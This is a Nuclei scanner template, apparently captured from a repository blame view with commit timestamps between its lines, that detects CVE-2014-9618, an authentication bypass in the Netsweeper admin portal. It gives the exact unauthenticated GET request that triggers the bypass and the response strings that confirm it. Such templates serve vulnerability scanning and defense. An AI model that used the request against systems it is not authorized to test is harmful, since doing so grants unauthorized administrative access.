2022-05-09 19:02:16 +00:00
id : CVE-2014-9618
2021-12-06 16:38:54 +00:00
info :
2022-05-10 14:00:17 +00:00
name : Netsweeper - Authentication Bypass
2022-05-09 19:02:16 +00:00
author : daffainfo
2021-12-06 16:40:52 +00:00
severity : critical
2022-05-09 19:02:16 +00:00
description : The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
2021-12-07 08:12:19 +00:00
reference :
2022-05-09 19:02:16 +00:00
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
2021-12-06 16:40:52 +00:00
classification :
2022-05-09 19:02:16 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2014-9618
cwe-id : CWE-287
tags : cve,cve2014,netsweeper,auth-bypass
2021-12-06 16:38:54 +00:00
requests :
2022-05-09 19:02:16 +00:00
- method : GET
2021-12-06 16:38:54 +00:00
path :
2022-05-09 19:02:16 +00:00
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
2021-12-06 16:38:54 +00:00
matchers-condition : and
matchers :
2022-05-09 19:02:16 +00:00
- type : word
2021-12-07 08:12:19 +00:00
part : body
2022-05-09 19:02:16 +00:00
words :
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- 'placeholder="Profile Manager">'
- '<title>Netsweeper WebAdmin</title>'
condition : and
2021-12-06 16:38:54 +00:00
- type : status
status :
2021-12-07 08:12:19 +00:00
- 200
2022-05-09 19:08:15 +00:00
2022-05-10 14:00:17 +00:00
# Enhanced by mp on 2022/05/10